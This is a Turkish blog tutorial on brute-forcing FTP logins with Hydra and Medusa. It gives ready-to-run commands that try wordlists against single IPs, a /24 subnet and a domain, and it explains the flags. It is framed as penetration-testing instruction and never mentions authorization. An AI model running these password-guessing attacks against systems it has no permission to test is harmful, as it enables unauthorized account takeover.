Ömür BOZDEMİR
FTP Penetration Testi Nasıl Yapılır?
Merhaba Arkadaşlar,
Bu makalemizde sizlere Hydra ve Medusa ile FTP saldırısı yapmayı anlatacağım.
Hydra İle FTP Saldırısı
Kendi hazırlamış olduğunuz yada dışardan bulmuş olduğunuz wordlist ile şifre denemeleri yapacağız.
Kendinize wordlist hazırlamak isterseniz https://www.bzdmr.com/kendi-wordlist-imi-nasil-yapabilirim-/sayfa/25 makalemizden yararlana bilirsiniz.
1.) Hangi kullanıcılar üzerinde atak yapılması istiyorsanız bunun için root/ dizini (farklı dizin) altında user.txt (farklı ad kullana bilirsiniz) dosyası oluştrumanız gerekmektedir.
touch /root/user.txt2.) Dosyayı açıp içerisine atak yapılmasını istediğiniz kullanıcı adlarını yazınız.
nano /root/user.txtYada açmadanda echo komutu ile satır satır ekleye bilirsiniz.
echo admin >> /root/user.txt3.) Hangi ip adresine yada host adına atak yapılmasını istiyorsanız root/ dizini (farklı dizin) altında server.txt (farklı ad kullana bilirsiniz) dosyası oluştrumanız gerekmektedir.
nano /root/server.txtYada açmadanda echo komutu ile satır satır ekleye bilirsiniz.
echo hostname >> /root/server.txt4.) Hazırlamış olduğumuz wordlist'imiz, user ve server dosyları ile artık saldırıya geçe biliriz. Aşağıdaki komut ile saldırıyı başlata bilirsiniz.
hydra -P root/wordlist.txt -L /root/user.txt -M /root/server.txt ftp -t 1Hydra ile FTP Manual Saldırısı Yapma
1.) Aşağıdaki komutla ile tek ip üzerine tek şifre ve tek kullanıcı adına saldırı yapmış olacaksınız.
hydra -p 1q2w3e4r -l user ftp://192.168.1.22.) Aşağıdaki komutla ile ip block üzerine tek şifre ve tek kullanıcı adına saldırı yapmış olacaksınız.
hydra -p 1q2w3e4r -l user ftp://192.168.1.1/243.) Aşağıdaki komut ile ip adresi ve host adını oluşturduğunuz server.txt dosyası haricinde diğerlerini manual olarak yazarak saldırı yapmış olacaksınız.
hydra -p 1q2w3e4r -l user -M root/server.txt ftp4.) Aşağıdaki komut ile oluşturduğunuz wordlist.txt dosyası haricinde diğerlerini manual olarak yazarak saldırı yapmış olacaksınız.
hydra -P root/wordlist.txt -l user ftp://192.168.1.15.) Aşağıdaki komutla birlikte ip block ve oluşturduğunuz wordlist.txt dosyası haricinde diğerlerini manual olarak yazarak saldırı yapmış olacaksınız.
hydra -P root/wordlist.txt -l user ftp://domain.com -t 1Medusa ile FTP Saldırısı Yapma
Yukarıda yapılan işlemler medusa’da, da aynı şekilde geçerlidir sadece birkaç komut değişikliği vardır. Sizlere medusa üzerinden FTP saldırısı için bir kaç örnek kodlar vereceğim.
medusa -h 192.168.1.1 -u root -P root/wordlist.txt -n 21 -M ftpmedusa -H root/server.txt -u root -P root/wordlist.txt -n 21 -M ftpAyrıca sizlere medusa üzerinde kullanabileceğiniz komutlardan bahsetmek istiyorum komutlar ve kullanım şekilleri aşağıdaki gibidir;
-h komutu hostname / ip olarak geçiyor bu komut yerine -H komutunu kullanırsanız dosya ile tarama yaparsınız. Örnek olarak -H /root/server.txt
-M komutu modül seçimi yapmanızaı sağlar örneğin FTP olarak varsayımda -M ftp komutu ile ftp modülü üzerinden saldırı yapmış olursunuz.
Diğer tüm modülleri görüntüleye bilmek için medusa -d komutunu kullanmanız yeterli olacaktır.
-n komutu port numarası belirlemine olanak sağlar örnek olarak -n 21 komutu ile 21. porta saldırı yapılacağını belirtmiş oluyorsunuz.
-P komutu oluşturduğunuz wordlist'i seçmenize olanak sağlar. Bunun yerine manual olarak -p 1q2w3e4r komutu ile manual olarak belirlediğiniz şifre ile saldırı denemesi yapmış olursunuz.
Bir başka makalede görüşmek dileği ile...